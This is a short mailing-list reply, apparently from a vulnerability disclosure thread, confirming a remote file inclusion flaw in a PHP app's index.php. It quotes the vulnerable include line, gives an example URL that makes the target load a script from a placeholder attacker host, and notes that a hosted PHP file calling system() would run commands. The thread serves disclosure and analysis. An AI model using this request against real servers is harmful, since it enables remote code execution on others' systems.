Josh Zlatin wrote:
> Looks to me like a clarification, meaning:
>http://[target]/index.php?page=http://[attacker]/evilscript>> opens and runs the php script (note the following code in index.php
> though: include($_GET["page"].".php");
Yes, it does appear to be a remote file include flaw. From index.php,
you have:
if ($_GET["page"]=='')
...
else
{
include($_GET["page"].".php");
}
> I was unable to run uname -a or any other command I tried via the cmd
> command, but that is probably because the 'cmd' variable is defined as
> the result of the following SQL query:
Actually, it just is passed to whatever URL you pass in via the page
parameter. So all you'd need to run code is a PHP script that calls
system() with the value of cmd.
George
--
theall at tenablesecurity.com